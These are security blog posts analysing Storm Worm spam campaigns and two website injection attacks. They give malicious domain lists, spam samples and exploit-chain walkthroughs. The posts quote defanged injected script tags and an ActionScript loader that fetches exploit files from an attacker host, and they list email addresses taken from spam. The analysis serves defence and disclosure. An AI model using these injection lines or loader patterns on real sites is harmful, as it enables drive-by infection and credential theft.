sudosecure.net

Looks like the authors couldn't resist the opportunity to entice United State citizens with a "Colorful Independence Day" theme. The good news is there are only 5 of the 24 domain names I reported the other day still active. Here is a list of the current active Storm Worm domain names:

• activeware.cn
• grupogaleria.cn
• lollypopycandy.com
• nationwide2u.cn
• likethisone1.com

The new "Colorful Independence Day" theme is a little different than past campaigns, as it only hosts one binary file and the ind.php exploit scripts. Usually the Storm Worm authors maintain two differently named binaries available for download through a hyperlink and by clicking an image file. This time the authors are only hosting a binary titled "fireworks.exe", which is downloaded by clicking a colorful image of a fireworks show. Here is a snapshot of the current site:

The normal ind.php file is a hidden iframe inclusion with the normal 9 exploits waiting to serve up a fresh install of the Storm Worm Trojan turning your computer into a spamming maniac. VirusTotal results shows that many of the Antivirus companies are still struggling to keep up and identify the constantly changing/morphing Storm Worm. With only ~52% (17/33) identifying the fireworks.exe binary as being malicious of which 2 of the 17 just state the file is suspicious. I wouldn't count the suspicious file signatures as a success, so in my opinion only 15/33 really identified the binary. Here is a link to the results page for VirusTotal.

With this being the evening of the beginning of my long weekend vacation I am going to cut this analysis short and leave you with a "Happy 4th of July" and be safe.

Looks like the authors of the Storm Worm are at it again with the "love theme", but this time with lots of love. I have identified 24 active Storm Worm web server domain names serving up a new storm worm binary with very little detection by the Antivirus companies according to my VirusTotal results (8/33 24% detection rate). My current list of active domain names are:

• activeware.cn
• bestlovelyric.com
• gonelovelife.com
• greatadore.com
• grupogaleria.cn
• knowholove.com
• likethisone1.com
• lollypopycandy.com
• loveisknowlege.com
• lovekingonline.com
• lovemarkonline.com
• loveoursite.com
• makeloveforever.com
• makingadore.com
• makingloveworld.com
• musiconelove.com
• nationwide2u.cn
• shelovehimtoo.com
• superlovelyric.com
• theplaylove.com
• wantcherish.com
• whoisknowlove.com
• wholovedirect.com
• wholoveguide.com

Most of these were identified through passive DNS techniques, and using my spam lab setup. Looking at the spam I captured in my lab for the newest Storm run, I was able to identify 64 unique Subject lines from 3,743 spam email messages. All 64 unique Subject lines related to the theme of love, which if I had to guess must pay high dividends for the Storm authors as they have returned to this theme over and over again. A few sample subject lines are:

• All I need is You
• Always on my mind
• Can't forget You
• Can't stay away from you
• Crazy in love
• Crazy in love with you
• Deep in my heart
• Deeply in love with you
• Dreaming 'bout you
• Everything for you

All 64 unique subject lines can be seen here: spam_subject.txt. The actual spam message contained 65 unique messages with a simple one line message containing hyperlinks to one of the 24 active Storm domains listed above. Following any of these hyperlinks leads to the newest version of the Storm Worm web server page, which maintains a Egreetings/Ecard design and the love theme, but with a twist. The web page title is:

Free I Love You Ecards, I Love You Greeting Cards, I Love You Greetings, Cards, ecards, egreetings

The twist is the Storm authors have added a flashy banner at the top of the page stating you are the 10,000 visitor and that you have won a prize. To claim the prize all you have to do is click through the fake banner advertisement. Here is a snapshot of the current Storm worm web page:

Examining the source code there are 2 unique binary names available for download: "winner.exe" and "mylove.exe". By clicking the image stating your the 10,000th visitor the winner.exe binary is downloaded. Clicking the hyperlink, "click here", the "mylove.exe" binary is downloaded. The storm worm authors are also actively maintaining a malicious script titled "ind.php" containing 9 individual exploits hidden from view with an iframe redirection and littered with heavy Javascript obfustication to evade detection and analysis.

It is my opinion that this particular version/run of the Storm Worm appears to be the largest in scale this year. I do not remember seeing this many active domain names being used in any of the past runs I have analyzed. I also noticed the Fast Flux network has modified all of the Storm Worm domain name A records TTL value to 60 seconds, instead of the normal 0 seconds. This means the Fast Flux DNS servers will rotate the A records every 60 seconds instead of after every individual query, which may be an attempt to throw off some techniques for analyzing and identifying Fast Flux domain names. Another reason I believe this is one of the largest scaled runs this year is my Storm Web server DNS tracking scripts are averaging ~3,200 unique IP addresses a day instead of last months daily average of 376 a day. Obviously this is a large increase, but it could be a misleading number, as my tracking scripts have more domain names to work with now than they have ever had in the past due to the fact there are so many active domain names right now.

Another lab run of the Storm Worm last night I captured 7,341 emails of which there were 31 unique Subject lines, 5 distinct email addresses in select message bodies, and 105 unique IP address direct links. The majority of last nights spam lab run contained the current theme of a disaster in China affecting the Olympic games in Beijing . Nothing new there, but I did find 1,144 messages which contained the following style of message:

Hello, my friend.

Do you want to buy any stuff: any kind of pills, oem software, cool porn?
Just mail me back, i'll find the best offer for you.

My Email: gpdude22@yahoo.com

Of these 1,144 messages containing this unique message I was able to extract 5 diffrent individual email addresses:

• cstygstra@gmail.com
• gpdude22@yahoo.com
• infrared35@gmail.com
• jim@tegelaar.com
• wagz_is_god@yahoo.com

I Googled all of these email addresses to see if possibly the Storm Worm Authors were raining some spam to these targeted emails, as this was my first thought, but found that these email addresses returned no results except for wagz_is_god@yahoo.com. I found a post from a user calling himself "wagzisgod" from 2004 about maintaining a traders list on spawn.com. The Google cached page can be seen here: Spawn.com Message Board post. So I don't think this a malicious attack against the email addresses listed above, but more likely a way of trying to identify active email addresses maintained in their current harvest lists. I sent an email using a newly created account and have yet to receive any response regarding my staged request for more information regarding the availability of the products in the spam message. I really didn't expect to receive a response, but this was more of an attempt to monitor spam generated from the Storm Worm, as this newly created email has only been used once making it perfect for tracking the Storm Spam if it works the way I hope it does. Only time will tell.

Here are the logs from last nights spam run in my lab for your own analysis: Full SMTP log, Unique IPs for Storm Web Servers in Spam Log, and Storm P2P Peer list.

With all of the know Storm Worm domain names temporarily not resolving, due to the Storm Worm designated name servers not responding to A record requests, the authors have reverted back to spamming direct IP links to our mail boxes. The main Storm Worm domain name servers I am aware of are:

• ns.likenewvideos.com
• ns2.likenewvideos.com
• ns3.likenewvideos.com
• ns4.likenewvideos.com
• ns.verynicebank.com
• ns2.verynicebank.com
• ns3.verynicebank.com
• ns4.verynicebank.com
• ns5.verynicebank.com
• ns6.verynicebank.com

I captured 1,014 spam messages in my lab this afternoon during a short run just to check on things. Of the 1,014 spam messages there were only 47 unique IP addresses and only 30 unique Subject lines. Here are two text files with the data: spam_ips.txt and spam_subjects.txt. As you can see the spam messages relate with the Storm Web server theme of a disaster in China and the 2008 Olympic Games in Beijing.

Another note of interest in my fake SMTP server logs is the User Agent for the spam messages seems to only ever be one of two different unique User Agents either "Thunderbird 2.0.0.6 (Windows/20070728)" or "Thunderbird 1.5.0.13 (Windows/20070809)". I can't believe I missed this, but after revisiting several of my old SMTP log files I have found this to be a common pattern for almost a month now. These both seem to be legitimate User Agents via my Google search results, but since they are old Thunderbird mail clients it may be worth looking into possibly writing a snort signature for something like this. I was thinking about testing the waters to see what I come up with in the next few days. If any of you run a mail server I would definitely be interested in hearing your opinion on how popular these User Agents are. Here is my full SMTP log for this afternoon's run: smtplogs.txt

To sum this short post up here is the usual Storm Peering IP list extracted from the configuration file: peers2.txt and my Virus Total results for the binary files: beijing.exe and msvupdater.exe.

Looks like the authors of the Storm Worm have decided to revisit the usage of exploits along with their normal Social Engineering techniques by including an iframe within their current web page. The current Storm Worm web page uses an earthquake message as it's attempt at social engineering unsuspecting users into downloading a video file, which of course is the Storm Worm. Here is the message the Storm authors are currently presenting to users:

A new powerful disaster just occurred in China. The most deadly, 9 magnitude, earthquake took away million of lives in the heart of China, Beijing. Rapidly growing panic paralyzed life of Chinese capital. 2008 Olympic Games are under the threat of failure. Click on the video to see the details of this terrible disaster and choose either "Open" or "Run".

Combining the upcoming Olympic games starting in ~49 days and a natural disaster looks like it may be a new theme that numerous Malware authors will begin to utilize, as current events and disasters always seem to attract a large crowd. I know we started seeing the Olympic games themed Malware several months ago, but now with the Storm Worm authors using it and the start of the games approaching it is my opinion we will see a quadratic rise in the amount of Malware, Phishing sites, and Social Engineering attempts tailored to the unsuspecting followers of the games.

The actual look and feel of this new page is simple and light. Here is an image of the current page:

Video themes also seem to be the standard approach for the Storm Worm authors, so I really was not surprised to see another one being used.

The source code for this page is where we will find the interesting and new obfusticated scripts used to execute multiple exploits tailored to your browser. Here is a snapshot of the source code for the index page:

Obviously if you click the image you will download the "beijing.exe" binary file, which is the Storm Worm Trojan. The interesting piece of code on this page is the iframe for including the "ind.php" file. This "ind.php" file is nothing new to the Storm Worm, as this file name has been utilized in the past Storm Worm exploit attempts and doesn't seem to be going away anytime soon. The contents of the "ind.php" file has changed and is a little harder to deobfusticate. It took me three runs through the file to deobfusticate and analysis this file. The exploit attempts in the "ind.php" file do not appear to be anything new, so I won't bore you with it's details other than stating everyone should keep all of their software applications up to date and patched. The binary downloaded inside the "ind.php" file is titled: "load.php?bof".

I ran the "load.php?bof" and "beijing.exe" through VirusTotal and here are the results: "load.php?bof" and "beijing.exe". The identification results were less than 50% for both binaries, so I would highly suggest you continue to block the know active Storm Worm domain names with DNS blackholing, content filters, and/or proxy filters. Here is a list of the current malicious Storm Worm Domain names hosting the Trojan binary using the theme discussed in this post:

• grupogaleria.cn
• activeware.cn
• cadeaux-avenue.cn
• polkerdesign.cn
• biztech-co.cn
• ratedhot.cn
• pacoast.cn
• fconnorlaw.cn
• tellicolakerealty.cn

I also ran the "load.php?bof" binary in my lab to get a quick look at the spam being sent out by this run, as it seems to be changing topics a little faster than normal with the recent penny stock emails and then back to Canadian pharmaceuticals. I captured 684 spam emails during this short lab run. The oddity with this run was I only identified one domain name being utilized in the data section of the email: "usualprocess.com" and of course the Storm Worm spam was applying a random subdomain name to this domain name. Here is all of the subdomain names I saw during my short run: smtp_log. Another thing I noticed was the name servers for the "usualprocess.com" were not only rotating IP addresses as they always do using a fast flux approach, but the name server domain names were being rotated as well. Here is a list of the name server domain names I saw in my queries:

• ns0.tenshinohane.com
• ns0.forgottensin.com
• ns0.toptenslist.com
• ns0.torstenstv.com

Obviously this is another attempt to keep the links being sent out in emails available. Using passive DNS analysis I was able to identify the following domains as active domain names being severed up by the above name servers, and this list may possibly be a few more domain names worthy of blocking:

• boywhole.com
• metalmorning.com
• oftendollar.com
• describeenter.com
• industryexpect.com
• meanquiet.com
• yetresult.com

The last thing I noted was this binary installed itself in the %WinDir% as "msvupdater.exe" with a peer file in this same directory titled "msvupdater.config". Here is the 830 peer IP addresses I extracted: peers.txt.

Tonights Storm Worm spam was made up of the same old Canadian Pharmaceutical material they were pushing out before the Angstrom Microsystems unauthorized stock spam campaign. The unique domains I extracted from the spam messages were:

• describeenter.com
• industryexpect.com
• meanquiet.com
• oftendollar.com
• yetresult.com

All of these domains are fast flux domains resolving to 20 different IP addresses per query that seem to rotate on a set schedule of every 2 minutes. There is no telling how many total IP addresses, but I am sure it is a lot. If you have DNS blackholing capabilities, content filters, and/or spam filters I would update them now with these domain names.

Another note of interest regarding this spam is wild card sub domains are being used in all of the spam messages I captured. Here is a list of the unique sub domains: sub domains list. This Canadian Pharmacy website does not seem to change much in it's presentation and the following logo seems to be constant.

The only new option I identified in looking at this site during this analysis was the option to submit your Instant Messenger information when trying to contact them. Just another way to collect user data in which they can use as a spam mechanism is my guess. Here is what the current form looks like:

This may not be a new, but it is the first time I noticed it. Another note of interest is they seem to take a wide variety of payment types as seen here.

As always if you have any questions or comments feel free to contact me.

Looks like the authors of the Storm Worm spamming bot have moved on from Canadian Pharmaceuticals to giving financial advice. While running the Storm Worm in my lab and allowing it to beat up my fake SMTP server I captured 2,379 spam messages. Of these there were only 130 unique subject lines, which can be seen here: subjects. As you can see all of the subjects pertain to motivating someone to go out and buy penny stocks. Various misspelled messages were seen such as this one:

d_ n't w e preidct it?

Busienss Name: Ans-gtrom Microsytsems
Ticker: agms.ob
Outlook: Storng Purchase
Marekt prcie: .4 00
Shaers- traded: 331,485-

Now that- the news it o'ut, vol.um e is thorugh __the roof.

Mroe events will un'fo"l d , clien'ts are seeing the need for these
prodcuts A GMS. can be your ticket.,

The window" is still open,' obtain this stock early Te'u sday.

This definitely is not the Storm Worm Authors most professional looking work, and is actually very sloppy compared to past spam campaigns. Here is a copy of my full log: smtp log

Another oddity in this move for pushing penny stocks, is the company being represented in these spam messages does not appear to be willing participants in the spam campaign. Searching Google, I found several references to these spam messages and actually found this particular article interesting: marketwatch.com article. Angstrom Microsystems appears to be searching out the people and/or organization behind these spam messages, so I have sent them an email describing my findings and wish them the best of luck with doing what many others would like to do and catch the Storm Worm Authors. Maybe with the help of the US Securities and Exchange Commission they will grow closer to being able to prosecute at least someone from the Russian Business Network. I wouldn't get my hopes up though.

The binary I used in my testing was the "loveyou.exe" binary being hosted by numerous Storm Web Servers. Once ran it creates another binary named "msoupdater.exe" in the "%WinDir%" along with a list of peers of other storm worm bots titled "msoupdater.config". Some good news about this version of the Storm Worm is it is being detected by Antivirus software fairly well. VirusTotal Results: loveyou.exe and msoupdater.exe. Here are the 903 peers I extracted from the msoupdater.config file: peers.txt.

On another note, sorry for my lack of posting lately as I have been on vacation and enjoying summer. As always if you have any questions or comments feel free contact me.

It looks like the Storm worm authors have finally got their DNS issues worked out and have started repairing the overall botnet structure. I wonder how much money is lost when a spam sending botnet the size of the Storm Worm is down for longer than a few days? I would bet it is a lot. Anyways it looks like the Storm Worm Web servers do not have an index page defined yet, but I bet that this configuration is short lived. I was only able to grab these files or pages from a Storm Worm server during my testing: ind.php, load.php, sony.exe, loveyou.exe, and iloveyou.exe. The iloveyou.exe and loveyou.exe are identical binaries with the same md5sums, and here is there VirusTotal results. The load.php and sony.exe are also identical binaries, and here is there VirusTotal results. According to the VirusTotal statistics it looks like about 50% of the Antivirus companies are detecting these binaries at this time. Running these binaries in my sandnet shows they are still using the herjek.exe and herjek.config file names and are located in the Windows directory (%windir%). Here is a list of the 815 peers I was able to extract: peers_list.txt.

Some of the more interesting findings in my tests this afternoon had to do with the spam the Storm Worm was trying to send out. All of the spam being sent out right now is using subdomain names for only a few unique domain names. The following are the unique domain names I was able to extract from my sandnet SMTP mail server:

• catsharp.com
• lowsmell.com
• picturewest.com
• posestory.com
• pressrose.com
• producemorning.com

Here are a few of the subdomain names I saw:

• aayxyi.catsharp.com
• acknl.pressrose.com
• acz.picturewest.com
• ad.producemorning.com
• adru.picturewest.com
• aegi.lowsmell.com
• aegirl.pressrose.com
• aemw.picturewest.com
• afpirl.picturewest.com

A full list of these subdomain names I was able to identify can be found here: smtp_sites subdomains. Obviously these subdomains are randomly generated and the Storm DNS servers have wildcards to accept requests for any subdomain for the few domain names I provided earlier. All of these domains and subdomains seem to point you to the Canadian Pharmacy site I spoke about in my last Storm Worm posting. This time though it looks like even the SPAM domains are using Fast Flux technology to rotate their IP addresses from a list of 20 IPs that are also rotated about every two minutes. This will definitely prevent IP blocks from being affective, so if you have any type of DNS blackholing or blacklists I would suggest you add these domains to those lists now. All of the SPAM was focused on Pharmaceuticals, which is fairly normal for the Storm Worm. Here is a list of the unique subject lines I saw in my sandnet: smtp_subjects.txt.

One last note of interest for everyone that emailed me about the Storm Binary Tracker being down. My outage was due to the Storm Worm having intermediate issues, but since these issues are over my Storm Binary Tracker is now back up and running. Happy Malware Hunting!

According to my Google searching chliyi.com has successfully been injected onto about ~12,000 sites. This malicious domain is using the well publicized Adobe Flash vulnerability along with a few others. The good news is Symantec Threatcon has retracted their declaration of this being a 0-day exploit, and have since clarified with the help of Adobe this exploit does not work on the newest version of the Flash Player version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see the entry page for this injection is chliyi.com/reg.js using the following code

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfustication, but does contain some interesting logic as you can see.

Obviously if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the Authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed be a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfustication starts. This also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfustication is done with VBScript and looks like this:

My first deobfustication revealed even more VBScript obfustication and can be seen here:

After the second deobfustication we see the first portion of the decision tree in choosing which exploits to send to the users computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successfully the next page that the user is directed to is the help.htm page, and if it is unsuccessfully created the user will be sent over to a serious of exploits to include the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfusticated with VBScript as well, but defiantly not as complicated. The obfusticated page looked like this:

Deobfusticated it is very clear what vulnerability the Authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate as lots of malicious code is still targeting it. It was only last month that the famous Mpack tool kit stopped including it, so as everyone has said before me keep you systems patched to avoid old vulnerabilities like this one from being exploited on your systems.

If the exploit is successful the user will download hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair with 22/32 (68.75%) which can be seen here: VirusTotal Results. Running this Trojan in my lab it grabbed two more files: FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealer's. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Here lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealer's.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash player exploit getting so much attention in the last few days. Most of the other sites using this exploit are embedding an Action Script that will actually direct you to load different Flash files using exploits based off your browser. For example most sites will separate the Firefox file from the IE file being used, but this one is not as sophisticated and serves only one flash media file. The flash decompile looks like this using swfdump:

A code extraction attempt using flare showed this:

I am fairly new at deobfusticating Flash files, but what I did notice is there is no action script associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. Also here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript obfusticated page, but this time targeting the Real Player (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates being published once a month. The deobfustication process took two VBScript deobfustications to display the actual JavaScript rendered exploit seen here:

I didn't include the obfusticated code snapshots as they were actually very large files with to many lines to try and take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfustication took 2 VBScript decodes to render the following code:

Obviously none of these exploits being severed up by this malicious domain are 0-day's, so if you will just keep your systems up to date and exercise alittle bit of caution when surfing the internet you should be ok. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest the filtering of the domain names seen in this analysis chliyi.com and jj120.net at the very minimum if you have that capability. Another option would be to block the IPs associated with these domain chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), this sometimes leads to legitimate sites being blocked as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn't surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map these types of injections server as the gateways to a much larger schema of user tracking, malicious code, and exploit serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non intrusively redirect you to a statistics gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistical gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to rendor one of two iframe redirections based off your browsers language settings. If you have the Chinese language back configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese Language pack. The le.htm file will attempt to server a Real Player exploit (CVE-2007-5601) to you and more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that will submit your information to the statistics gather web server: vip2.51.la/go.asp. Strategically placing these statistic gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source sode here in PDF format: 1662569_js. Source Code and le_htm Source Code

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese Language pack. This file appears to be the most complex piece to this malicious schema with several logically choosen exploits being severed up and is obfusticated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) Function (MS06-014). If your configuration doesn't throw an error on the creation of the Adobe.Stream object you will be iframed redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601 and is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to xxp://www.dota11.cn/rl.htm, where this vulnerability will be attempted to be exploited. If the above Real Player vulnerability probe fails and throws an error you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerabilty (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm which looks like a left behind iframe refrence that the designer forgot to clean up. I say this because I recieved a 404 error when I tryed grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files although hosted on separate domains contain the exact same content. Both of these are serving up malicious Flash Media files. If your using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded Action Script logic to redirect you to a malicious Flash Media file based off your Flash media player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following exert is from the Action Script being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();
}
}

This looks like the same vulnerabilities SANS.org is referencing Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.